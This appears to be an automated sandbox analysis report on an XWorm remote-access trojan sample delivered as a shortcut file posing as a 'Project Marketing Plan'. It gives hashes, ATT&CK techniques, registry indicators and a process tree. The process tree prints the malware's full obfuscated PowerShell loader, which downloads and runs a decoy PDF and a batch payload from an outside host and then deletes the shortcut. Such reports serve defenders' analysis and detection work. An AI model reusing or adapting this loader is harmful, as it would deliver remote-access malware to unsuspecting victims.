xworm | ec58a22e01ef99de36fbe2a8d66a81c0b4acf7938e51a59c72c027cef04f314c

Analysis

max time kernel
147s
max time network
137s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
21-04-2023 11:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Details of Project Marketing Plan.lnk
Size

283.4MB
MD5

8dc27ba3775ecc1d2b98b8a6f0d5ce7b
SHA1

37d5fcd4c70c06be6768122a7bd1dfd9e45e4cfe
SHA256

6f6f882d4ec5de6025bf4cf8135aeee95b5fb1d3acb33a83fdac5cc995776bc0
SHA512

521065e48bba639657f29525f6e008d53597da8536cb91f0f029a9b8aa7dcfd7bc8002700fad9fecc6eba32b06f2b19bbb86314e78a1ae1c047f6080bfca797f
SSDEEP

1536:roFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFv:r

Score

10^/10

xworm rat trojan

Malware Config

Signatures

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 1 IoCs

flow	pid	Process
17	4432	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
728	p41g.bat

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
4432	powershell.exe
4432	powershell.exe
1076	AcroRd32.exe
1076	AcroRd32.exe
1076	AcroRd32.exe
1076	AcroRd32.exe
1076	AcroRd32.exe
1076	AcroRd32.exe
1076	AcroRd32.exe
1076	AcroRd32.exe
1076	AcroRd32.exe
1076	AcroRd32.exe
1076	AcroRd32.exe
1076	AcroRd32.exe
1076	AcroRd32.exe
1076	AcroRd32.exe
1076	AcroRd32.exe
1076	AcroRd32.exe
1076	AcroRd32.exe
1076	AcroRd32.exe
1076	AcroRd32.exe
1076	AcroRd32.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4432	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1076	AcroRd32.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
1076	AcroRd32.exe
1076	AcroRd32.exe
1076	AcroRd32.exe
1076	AcroRd32.exe
1076	AcroRd32.exe
1076	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 60 wrote to memory of 4504	60	cmd.exe	83
PID 60 wrote to memory of 4504	60	cmd.exe	83
PID 4504 wrote to memory of 4432	4504	cmd.exe	84
PID 4504 wrote to memory of 4432	4504	cmd.exe	84
PID 4432 wrote to memory of 1076	4432	powershell.exe	85
PID 4432 wrote to memory of 1076	4432	powershell.exe	85
PID 4432 wrote to memory of 1076	4432	powershell.exe	85
PID 4432 wrote to memory of 728	4432	powershell.exe	90
PID 4432 wrote to memory of 728	4432	powershell.exe	90
PID 4432 wrote to memory of 728	4432	powershell.exe	90
PID 1076 wrote to memory of 632	1076	AcroRd32.exe	91
PID 1076 wrote to memory of 632	1076	AcroRd32.exe	91
PID 1076 wrote to memory of 632	1076	AcroRd32.exe	91
PID 632 wrote to memory of 3720	632	RdrCEF.exe	94
PID 632 wrote to memory of 3720	632	RdrCEF.exe	94
PID 632 wrote to memory of 3720	632	RdrCEF.exe	94
PID 632 wrote to memory of 3720	632	RdrCEF.exe	94
PID 632 wrote to memory of 3720	632	RdrCEF.exe	94
PID 632 wrote to memory of 3720	632	RdrCEF.exe	94
PID 632 wrote to memory of 3720	632	RdrCEF.exe	94
PID 632 wrote to memory of 3720	632	RdrCEF.exe	94
PID 632 wrote to memory of 3720	632	RdrCEF.exe	94
PID 632 wrote to memory of 3720	632	RdrCEF.exe	94
PID 632 wrote to memory of 3720	632	RdrCEF.exe	94
PID 632 wrote to memory of 3720	632	RdrCEF.exe	94
PID 632 wrote to memory of 3720	632	RdrCEF.exe	94
PID 632 wrote to memory of 3720	632	RdrCEF.exe	94
PID 632 wrote to memory of 3720	632	RdrCEF.exe	94
PID 632 wrote to memory of 3720	632	RdrCEF.exe	94
PID 632 wrote to memory of 3720	632	RdrCEF.exe	94
PID 632 wrote to memory of 3720	632	RdrCEF.exe	94
PID 632 wrote to memory of 3720	632	RdrCEF.exe	94
PID 632 wrote to memory of 3720	632	RdrCEF.exe	94
PID 632 wrote to memory of 3720	632	RdrCEF.exe	94
PID 632 wrote to memory of 3720	632	RdrCEF.exe	94
PID 632 wrote to memory of 3720	632	RdrCEF.exe	94
PID 632 wrote to memory of 3720	632	RdrCEF.exe	94
PID 632 wrote to memory of 3720	632	RdrCEF.exe	94
PID 632 wrote to memory of 3720	632	RdrCEF.exe	94
PID 632 wrote to memory of 3720	632	RdrCEF.exe	94
PID 632 wrote to memory of 3720	632	RdrCEF.exe	94
PID 632 wrote to memory of 3720	632	RdrCEF.exe	94
PID 632 wrote to memory of 3720	632	RdrCEF.exe	94
PID 632 wrote to memory of 3720	632	RdrCEF.exe	94
PID 632 wrote to memory of 3720	632	RdrCEF.exe	94
PID 632 wrote to memory of 3720	632	RdrCEF.exe	94
PID 632 wrote to memory of 3720	632	RdrCEF.exe	94
PID 632 wrote to memory of 3720	632	RdrCEF.exe	94
PID 632 wrote to memory of 3720	632	RdrCEF.exe	94
PID 632 wrote to memory of 3720	632	RdrCEF.exe	94
PID 632 wrote to memory of 3720	632	RdrCEF.exe	94
PID 632 wrote to memory of 3720	632	RdrCEF.exe	94
PID 632 wrote to memory of 3720	632	RdrCEF.exe	94
PID 632 wrote to memory of 3720	632	RdrCEF.exe	94
PID 632 wrote to memory of 4124	632	RdrCEF.exe	95
PID 632 wrote to memory of 4124	632	RdrCEF.exe	95
PID 632 wrote to memory of 4124	632	RdrCEF.exe	95
PID 632 wrote to memory of 4124	632	RdrCEF.exe	95
PID 632 wrote to memory of 4124	632	RdrCEF.exe	95
PID 632 wrote to memory of 4124	632	RdrCEF.exe	95
PID 632 wrote to memory of 4124	632	RdrCEF.exe	95
PID 632 wrote to memory of 4124	632	RdrCEF.exe	95
PID 632 wrote to memory of 4124	632	RdrCEF.exe	95
PID 632 wrote to memory of 4124	632	RdrCEF.exe	95

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Details of Project Marketing Plan.lnk"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:60
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c p""o""w""e""r""s""h""e""l""l/""W 0""1 $hawk=''+'I'+''+'e'+'X';sal hawkeyes $hawk;$PSI = hawkeyes($('[EnvifRV]::GetEnvifRVVarisOS(''public'') + ''\p41g.bat''').Replace('fRV','ronment').Replace('sOS','able'));function MIVr($p, $u){ hawkeyes($('(bAhN SyrhdD.Net.EmaaClient).DownEZFU($u.Replace(''Vhs'',''e'').Replace(''wyU'',''tps://'').Replace(''srUGs'',''.''), $p);').Replace('EZFU','loadFile').Replace('bAhN','New-Object').Replace('rhdD','stem').Replace('Emaa','Web'));hawkeyes($('stLhLf $p;').Replace('LhLf','art'));}$XCu = $(Get-Location).tostring() + '\';MIVr -p ($XCu + 'Report_Ads_Mar_Apr_2022.pdf') -u 'htwyUtVhschvibVhsosrUGscom/filVhss2/RVhsport_Ads_Mar_Apr_2022srUGslnk';MIVr -p $PSI -u 'htwyUtVhschvibVhsosrUGscom/filVhss2/LBusinVhsss Plan 2023srUGslnk';Remove-Item -Path ($XCu + $(Get-ChildItem -Include *.lnk -Name));exit;
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4504
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    p""o""w""e""r""s""h""e""l""l /""W 0""1 $hawk=''+'I'+''+'e'+'X';sal hawkeyes $hawk;$PSI = hawkeyes($('[EnvifRV]::GetEnvifRVVarisOS(''public'') + ''\p41g.bat''').Replace('fRV','ronment').Replace('sOS','able'));function MIVr($p, $u){ hawkeyes($('(bAhN SyrhdD.Net.EmaaClient).DownEZFU($u.Replace(''Vhs'',''e'').Replace(''wyU'',''tps://'').Replace(''srUGs'',''.''), $p);').Replace('EZFU','loadFile').Replace('bAhN','New-Object').Replace('rhdD','stem').Replace('Emaa','Web'));hawkeyes($('stLhLf $p;').Replace('LhLf','art'));}$XCu = $(Get-Location).tostring() + '\';MIVr -p ($XCu + 'Report_Ads_Mar_Apr_2022.pdf') -u 'htwyUtVhschvibVhsosrUGscom/filVhss2/RVhsport_Ads_Mar_Apr_2022srUGslnk';MIVr -p $PSI -u 'htwyUtVhschvibVhsosrUGscom/filVhss2/LBusinVhsss Plan 2023srUGslnk';Remove-Item -Path ($XCu + $(Get-ChildItem -Include *.lnk -Name));exit;
    3⤵
    - Blocklisted process makes network request
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4432
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Report_Ads_Mar_Apr_2022.pdf"
      4⤵
      Checks processor information in registry
      Modifies Internet Explorer settings
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:1076
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:632
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=902241E241DA26927C6542720AE300B2 --mojo-platform-channel-handle=1740 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        6⤵
        
        PID:3720
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=F89D0D668D5F9D87959EF3695A0C8341 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=F89D0D668D5F9D87959EF3695A0C8341 --renderer-client-id=2 --mojo-platform-channel-handle=1748 --allow-no-sandbox-job /prefetch:1
        6⤵
        
        PID:4124
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=67B563CCFD022A169E04A9014B6EA9C6 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=67B563CCFD022A169E04A9014B6EA9C6 --renderer-client-id=4 --mojo-platform-channel-handle=2304 --allow-no-sandbox-job /prefetch:1
        6⤵
        
        PID:4892
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=A928F43FEF95408EF5792FC89D6C47B2 --mojo-platform-channel-handle=2460 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        6⤵
        
        PID:1304
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=291250ADCEE0DEAEC8E0A6DCB823B0EA --mojo-platform-channel-handle=1876 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        6⤵
        
        PID:3868
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=7BB340CF51574B7BE39CDD3F27EE3BD1 --mojo-platform-channel-handle=1740 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        6⤵
        
        PID:4464
  - - C:\Users\Public\p41g.bat
      "C:\Users\Public\p41g.bat"
      4⤵
      Executes dropped EXE
      PID:728

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4208

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
36KB

MD5
b30d3becc8731792523d599d949e63f5

SHA1
19350257e42d7aee17fb3bf139a9d3adb330fad4

SHA256
b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

SHA512
523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
56KB

MD5
752a1f26b18748311b691c7d8fc20633

SHA1
c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

SHA256
111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

SHA512
a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
64KB

MD5
b965d6a88b8e2ce608cc34394758f36f

SHA1
83f401afab33f4ab92dfcf7124828c9b38409bf1

SHA256
670258bd3e174e8e300c5d5ebb03a8480f3408d3757eb477f970ef7125a0bfde

SHA512
b8d36d8882e528319f4e75481dc084e4a4700edb33d3d1050eb795e998e359fc94e532d39be371f56fbd3d8b709f74ae647e06200a045c34475af4946b68af56

Download Submit
C:\Users\Admin\AppData\Local\Temp\Report_Ads_Mar_Apr_2022.pdf

Filesize
3.9MB

MD5
0c9b138b3e3e7ffef8088b9b8ee987e0

SHA1
aa938ae06d77cb3bfe8bd529d2dfb59c6a2a8196

SHA256
70e273c6c15a3d730dc23c67ecdb51d401b40bfbd225439d6815389822821c19

SHA512
13baad12780163a807170841aa050a947e6b217fd073c709836f27f1cd258a3f2f196d48b1be62bad35a5d1135844294fd7911a73c49a72ad9c050630d30c1ae

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yqihrig4.3xm.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Public\p41g.bat

Filesize
61.2MB

MD5
546970ad7aaaf199a426c8ab2c45a900

SHA1
99a8628acd8a447c9afcfc19e20a628ce828aa40

SHA256
7cb2d4365a8f1eba5f2c5942f5737768cad434b1b6ef3ceddf28434a8c38e8d6

SHA512
25b491712cbe12736d401fb49b0e28871437e1cf0497959cf9201aee57e0adeead85145812fa82dc8d9ddb99d0c7fa2d73a57728542014e35de9561435b9ab80

Download Submit
C:\Users\Public\p41g.bat

Filesize
61.2MB

MD5
546970ad7aaaf199a426c8ab2c45a900

SHA1
99a8628acd8a447c9afcfc19e20a628ce828aa40

SHA256
7cb2d4365a8f1eba5f2c5942f5737768cad434b1b6ef3ceddf28434a8c38e8d6

SHA512
25b491712cbe12736d401fb49b0e28871437e1cf0497959cf9201aee57e0adeead85145812fa82dc8d9ddb99d0c7fa2d73a57728542014e35de9561435b9ab80

Download Submit
memory/4432-133-0x000002D279090000-0x000002D2790B2000-memory.dmp

Filesize
136KB

Download
memory/4432-143-0x000002D276820000-0x000002D276830000-memory.dmp

Filesize
64KB

Download
memory/4432-144-0x000002D276820000-0x000002D276830000-memory.dmp

Filesize
64KB

Download
memory/4432-145-0x000002D276820000-0x000002D276830000-memory.dmp

Filesize
64KB

Download
memory/4432-203-0x000002D2790C0000-0x000002D2792DC000-memory.dmp

Filesize
2.1MB

Download